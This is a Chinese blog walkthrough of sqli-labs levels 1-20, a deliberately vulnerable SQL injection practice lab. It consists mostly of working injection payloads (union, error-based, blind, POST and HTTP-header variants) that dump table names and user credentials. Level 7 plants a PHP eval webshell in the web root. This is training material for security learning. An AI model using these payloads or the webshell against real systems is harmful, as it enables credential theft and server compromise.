sqli-labs靶场通关技巧(1-20)

最新推荐文章于 2024-08-14 20:22:21 发布
最新推荐文章于 2024-08-14 20:22:21 发布
阅读量2.3k 收藏 13
点赞数 3
分类专栏: sql注入 文章标签: sql 安全漏洞 黑盒测试 信息安全 测试工程师
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/107600741
版权

Less1

注入步骤:

在参数后面加上单引号,数据库报错,说明存在注入

id=1' and 1=1--+,返回正常

id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入

用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+

确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数)

 

暴库payload:

id=-1' union select 1,2,database()--+

 

暴表payload:

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 

暴字段payload:

id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

 

暴用户名和密码的值payload:

id=-1' union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less2

数字型注入:?id=1 and 1=1--+

暴库payload:?id=-1 union select 1,2,database()--+

暴表payload:id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload:id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload:id=-1 union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less3

基于’)的字符型注入:id=1') and 1=1--+

暴库payload:id=-1') union select 1,2,database()--+

暴表payload:id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload:id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload:id=-1') union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less4

基于”)的字符型注入:id=1”) and 1=1--+

暴库payload:id=-1") union select 1,2,database()--+

暴表payload:id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

暴字段payload:id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

暴值payload:id=-1") union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less5

基于’字符型的报错注入

暴库payload:id=1' union select updatexml(1,concat(0x7e,(database()),0x7e),1)--+

暴表payload:id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

暴字段payload:id=1' union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

暴值payload:id=1' union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)--+

 

Less6

基于”字符型的报错注入

暴库payload:id=1” union select updatexml(1,concat(0x7e,(database()),0x7e),1)--+

暴表payload:id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

暴字段payload:id=1" union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

暴值payload:id=1" union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)--+

 

Less7

写入一句话木马:

id=1')) union select 1,'2','<?php @eval($_POST["a"]);?>' into outfile 'D:\\phpstudy\\WWW\\1.php' --+

 

蚁剑连接:

 

Less8

基于’字符型的布尔盲注

判断数据库名长度:id=1' and length(database())>7--+

暴库payload:id=1' and ascii(substr(database(),1,1))>100--+

暴表payload:id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

暴字段payload:id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100--+

暴值payload:id=1' and ascii(substr((select password from security.users limit 0,1),1,1))>100--+

 

Less9

基于’字符型的时间盲注

判断数据库名长度:id=1' and if(length(database())>7, 0, sleep(5))--+

暴库payload:id=1' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

暴表payload:id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

暴字段payload:id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

暴值payload:id=1' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

Less10

基于”字符型的时间盲注

判断数据库名长度:id=1" and if(length(database())>8, 0, sleep(5))--+

暴库payload:id=1" and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

暴表payload:id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

暴字段payload:id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

暴值payload:id=1" and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

Less11

基于’的POST型注入

暴库payload:-admin' union select 1,database()-- -

暴表payload:-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- -

暴字段payload:-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- -

暴值payload:-admin' union select 1,group_concat(username,'-',password) from security.users-- -

 

Less12

基于”)的POST型注入

暴库payload:-admin") union select 1,database()-- -

暴表payload:-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- -

暴字段payload:-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'-- -

暴值payload:-admin") union select 1,group_concat(username,'-',password) from security.users-- -

 

Less13

基于’)的报错注入

暴库:admin') union select updatexml(1,concat(0x7e,(database()),0x7e),1) -- -

暴表payload:admin') union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload:admin') union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload:admin') union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)-- -

 

Less14

基于”的报错注入

暴库:admin" union select updatexml(1,concat(0x7e,(database()),0x7e),1) -- -

暴表payload:admin" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload:admin" union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload:admin" union select updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1)-- -

 

Less15

基于’的POST型时间/布尔盲注

判断数据库名长度:admin' and if(length(database())>7, 0, sleep(5))-- -

暴库payload:admin' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))-- -

暴表payload:admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴字段payload:admin' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴值payload:admin' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))-- -

 

Less16

基于")的POST型时间/布尔盲注

判断数据库名长度:admin") and if(length(database())>8, 0, sleep(5))-- -

暴库payload:admin") and if(ascii(substr(database(),1,1))>100, 0, sleep(5))-- -

暴表payload:admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴字段payload:admin") and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))-- -

暴值payload:admin") and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))-- -

 

Less17

基于’的POST型报错注入

 

暴库:admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -

暴表payload:admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)-- -

暴字段payload:admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- -

暴值payload:admin' and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1)-- -

 

Less18

基于’的User-Agent:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文User-Agent:后加入注入语句

暴库Payload:',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

爆表payload:',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

爆字段payload:',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

爆值payload:',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#

 

Less19

基于’的Referer:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文Referer:后加入注入语句

暴库Payload:',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

爆表payload:',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

爆字段payload:',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

爆值payload:',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#

 

Less20

基于’的Cookie:报头文报错注入

用Burp Suite抓取输入正确用户密码的登录页面,然后在报头文Cookie:后加入注入语句

暴库Payload: uname=-admin' union select 1,2,database()--+

爆表payload:uname=-admin' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆字段payload:uname=-admin' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

爆值payload:uname=-admin' union select 1,2,group_concat(username,'-',password) from security.users--+

 

总结

Less1-4有回显,用联合查询注入可以显示数据库信息

Less5-6 利用报错注入,将数据库信息显示出来

Less7直接写入一句话木马,用菜刀或蚁剑连接

Less8-10 布尔/时间盲注,需要逐个字符猜解,结合burpsuite暴力破解更方便

Less11-17 POST型注入,在用户名或密码后面拼接注入语句

Less18-20 POST头部报错注入,在相应的头部信息后面拼接注入语句

 

参考链接:https://blog.csdn.net/weixin_45728976/article/details/103932264

参考链接:https://blog.csdn.net/qq_41420747/article/details/81836327?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase#less-15%C2%A0POST%20-%20Blind-%20Boolian%2Ftime%20Based%20-%20Single%20quotes%20(%E5%9F%BA%E4%BA%8Ebool%E5%9E%8B%2F%E6%97%B6%E9%97%B4%E5%BB%B6%E8%BF%9F%E5%8D%95%E5%BC%95%E5%8F%B7POST%E5%9E%8B%E7%9B%B2%E6%B3%A8)

 

 

见痴
关注
专栏目录
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7779
sqli-labs,sql注入,burpsuit
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2024
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场第二十关
gou1791241251的博客
12-30 1201
根据提示,二十关是cookie注入。我们输入单引号和双引号进行测试 发现它报错了,说明应该是单引号闭合的 尝试一下构建报错注入。 此处的报错信息中查询到了数据库版本,同理可以查询所有库,所有表名,所有字段名等信息。 ...
sqli-labs靶场通关攻略(1-20关)
最新发布
kknifek的博客
08-14 791
sql手工注入
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 1062
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-labs SQL注入靶场通关手册(1-20
2401_83601024的博客
05-18 1977
因为我们使用单引号闭合了 passwd 参数所在的 Sql 语句的前面的部分,使用 OR 连接的 updatexml() 函数就会被执行。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。
sqli-labs SQL注入靶场通关手册(1-21)
2301_76594872的博客
07-02 986
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1552
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 821
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1147
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1334
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs 1-20关卡
borrrrring的博客
10-10 433
less 1 “基于单引号的报错字符型注入” Payload: 1.?id=1’ --+ //闭合前面语句,注释掉后面的‘ 2.?id=1’ order by X–+ //判断字段数 3.?id=-1’ union select 1,2,3 --+ //判断回显位置,id为false 4.?id=-1’ union select 1,database(),3 --+ //查询当前数据库名 5.?id=-1’ union select 1,group_concat(table_name),3
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2212
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-liabs学习SQL注入之旅(第十一关~第二十关)
guanjian_ci的博客
04-22 2825
十一关 可以看到十一关和之前的十关是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一关存在弱口令,但我们要学习的是SQL注入) 账号:admin .
SQL注入--靶场练习
wmr123456001的博客
02-11 2121
SQL注入靶场练习
(手工+sqlmap)【sqli-labs1-20】基础注入
07-10 1312
SQLsqlmap+手工
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2267
本文章主要是关于sqli-labs靶场1-20关的通关方法
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1249
Sqli-labs-master靶场1-20通关教程
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值